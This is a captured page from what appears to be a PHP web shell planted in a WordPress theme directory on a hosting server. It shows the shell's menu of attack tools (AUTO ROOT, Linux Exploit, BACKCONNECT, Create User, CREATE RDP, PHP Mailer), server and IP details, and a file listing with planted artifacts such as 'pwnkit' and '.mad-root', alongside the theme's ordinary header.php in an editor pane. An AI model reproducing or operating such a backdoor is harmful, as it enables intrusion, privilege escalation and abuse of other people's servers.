Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
signify /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
sass
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
404.php
1.28
KB
-rw-r--r--
adminer.php
0
B
-rw-r--r--
archive.php
1.6
KB
-rw-r--r--
comments.php
2.04
KB
-rw-r--r--
footer.php
715
B
-rw-r--r--
functions.php
18.72
KB
-rw-r--r--
header.php
1.17
KB
-rw-r--r--
index.php
1.88
KB
-rw-r--r--
page.php
840
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
6.01
KB
-rw-r--r--
rtl.css
16.61
KB
-rw-r--r--
screenshot.png
173.25
KB
-rw-r--r--
search.php
1.55
KB
-rw-r--r--
searchform.php
843
B
-rw-r--r--
sidebar.php
376
B
-rw-r--r--
single.php
1.24
KB
-rw-r--r--
style.css
328.65
KB
-rw-r--r--
style.scss
4.55
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : header.php
<?php /** * The header for our theme * * This is the template that displays all of the <head> section and everything up until <div id="content"> * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package Signify */ ?> <!doctype html> <html <?php language_attributes(); ?>> <head> <meta charset="<?php bloginfo( 'charset' ); ?>"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <?php wp_head(); ?> </head> <body <?php body_class(); ?>> <?php do_action( 'wp_body_open' ); ?> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content"><?php esc_html_e( 'Skip to content', 'signify' ); ?></a> <header id="masthead" class="site-header"> <div class="site-header-main"> <div class="wrapper"> <?php get_template_part( 'template-parts/header/site', 'branding' ); ?> <?php get_template_part( 'template-parts/navigation/navigation', 'primary' ); ?> </div><!-- .wrapper --> </div><!-- .site-header-main --> </header><!-- #masthead --> <?php signify_sections(); ?> <div id="content" class="site-content"> <div class="wrapper">
Close